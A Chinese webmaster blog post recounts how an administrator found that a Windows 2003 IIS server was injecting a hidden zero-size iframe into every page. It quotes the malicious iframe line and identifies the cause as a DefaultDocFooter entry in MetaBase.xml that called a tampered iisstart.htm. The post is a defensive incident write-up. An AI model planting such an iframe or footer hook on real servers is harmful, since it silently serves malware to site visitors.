网站运营
位置:首页>> 网站运营>> 处理Windows 2003服务器IIS被挂马全过程

处理Windows 2003服务器IIS被挂马全过程

  发布时间:2010-05-03 13:33:00 

标签:IIS挂马,winodws,2003,服务器

一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒

打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码

分析原因

首先怀疑ARP挂马,用防ARP的工具又没有发现有arp欺骗,而且arp欺骗一般不会每次都 * 入代码,而是时有时无.而且使用http://127.0.0.1 或者http://localhost 访问的时候也可以找到这段代码,arp欺骗的可能排除。

然后就想到可能是JS被篡改,或者是其它的包含文件,查找后没有发现被改的页面 连新建的HTML页面浏览的时候也会 * 入这段代码,那就只能是通过IIS挂上去的了。
备份iis数据然后重装iis,代码消失,将备份的iis恢复,问题又来了。

仔细寻找,问题应该出在IIS的配置文件上,打开配置文件,没有发现那段代码。

那很有可能是调用了某个文件,这个怎么查啊,忽然想起了大名鼎鼎的Filemon

本地载了一个上传到服务器上,打开Filemon,数据太多了,过滤掉一些没有用的只留下iis的进程,数据还是很多,看来服务器上的站点还是挺多人在访问的。

关掉所有站点,建了一个测试站点anky 目录为D:\www\ 在下面建了一个空白页面test.htm
访问一下这个页面代码 * 进来了,再看一下Filemon 奇怪怎么读取C:\Inetpub\wwwroot\iisstart.htm,打开C:\Inetpub\wwwroot\iisstart.htm一看,里面就躺着:

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

把代码删除了留空,访问test.htm 正常了,把C:\Inetpub\wwwroot\iisstart.htm删除了再访问test.htm 出现 “读取数据页脚文件出错”问题就出这里了,看来是调用了
这个文件。把C:\Inetpub\wwwroot\iisstart.htm清空就正常了,这样怎么行,解决问题当然要连根拔掉。

continue

有没有可能是扩展造成的,到扩展中检查了一遍全部都是正常的当然 通过ISAPI 挂马的也是存在的左想右想最后还是觉得配置文件有问题打开配置文件,配置文件在%windir%\system32\inetsrv\MetaBase.xml用记事本打开,查找iisstart.htm 找到一行,开始以为是默认站点,后来一想不对啊。

默认站点都删除了,再仔细一看这句代码为

DefaultDocFooter="file:C:\Inetpub\wwwroot\iisstart.htm"

删除掉这一行,问题彻底解决了。

0
投稿

猜你喜欢

  • 这里我主要针对SEO工作中的链接建立来谈,因为这部分工作是困扰很多SEO人员和站长的首要难题。1、友情链接这个方法估计是站长和推广人员使用最
  • 外链是搜索优化的一件重磅武器,增加外链主要包括交换链接,论坛推广,博客推广三种,其他的像花钱买广告,挂马找肉鸡,一个是要花钱,一个要技术,其
  • 学习seo也有很长一段时间了,这段时间也操作了很多案例,进行过很多次的试验和测试,对于网站优化,自己也有很多的体会,现在和大家一起交流下自己
  • 每个站长在建站之初,都很明确自己网站的定位及网站的目标客户群,那么,在具体的推广工作中,我们该如何寻找自己的目标客户,以便更有针对性的推广自
  • 12月21日消息,据国外媒体报道,微软将推迟发布Visual Studio 2010和.NETFramework4等软件以便有更多的时间解决
  • 电子邮件是人们在网上最常使用的通信工具之一,它已经成为我们网络生活中不可或缺的一部分,而其在局域网中也是一项很重要的应用。在局域网中构建一个
  • 笔者是某单位大楼的一名网络管理员,平时主要任务就是维护大楼局域网网络的安全、稳定运行。最近一段时间,隔三差五的,大楼局域网网络总会发生一些故
  • 在/etc/ftpaccess里面加上: throughput /home/ftp * * 64000 0.5 *意思是下载带宽对所有IP(
  • “忽如一夜春风来,千树万树梨花开”,这句诗跟现今网页游戏遍地开花的景象甚是贴合。据不完全数据统计,目前我国有近300多家互联网公司在开发以及
  • V5shop多用户商城系统——v5mall宣布免费继v5shop独立网店系统全线免费取得良好的市场反应后,上海威博网络技术有限公司最近宣布最
  • 草根精神,一息尚存,奋斗到底!在这里首先向所有奋斗在草根前线的站长们道一声:你们辛苦了,没有你们每天的努力中国互联网不会向今天这样辉煌!网民
  • 第一道槛:刚接触SEO的时候 心理特征:1. 好奇心:满世界的找SEO教程,想了解更多。2. 兴奋:看了些教程后,感觉SEO并不神秘,教程一
  • 网站擅自转播奥运火炬珠峰传递节目,是爱国还是侵权?昨天,央视国际网络有限公司诉世纪龙网络有限责任公司(下称&ldquo;世纪龙&am
  • 由外国破解小组透露出的最新消息表明,暴雪不久前开始Beta测试的新一代即时战略游戏《星际争霸2》在破解进度上取的重大突破,目前已经可以进入单
  • ftp 文件传输服务,其余的不多讲了,直接进入主题。今天我给大家说的是使用vsftpd架设ftp服务器,希望对大家有所帮助。A 安装vsft
  • htaccess文件一直以来都是国内外众SEO高手所仔细研究的一个文件,因为该文件在很多情况下接管着网站的最高配置(比如虚拟主机),如果能合
  • 2003服务器安全攻略(不会做服务器安全的站长请进)windows server2003是目前最为成熟的网络服务器平台,安全性相对于wind
  • 各位站长朋友们,你们是否长期做在电脑前,对着电脑忙碌着呢?下面介绍几种消除疲劳以及保护眼睛的方法,或者会有些帮助。菊花茶是保护眼睛的好饮料!
  • 最近google补充材料特别多,我个人感觉是google的算法有所调整,更多的网页被打入冷宫成为补充材料。在“Google“补充资料”成因及
  • 前段时间自己的一个网站进沙盒了,心里很是着急,现在这个网站终于走出google的沙盒了,现在和大家分享下 ,其实对待网站进沙盒如何让网站尽快
手机版 网站运营 asp之家 www.aspxhome.com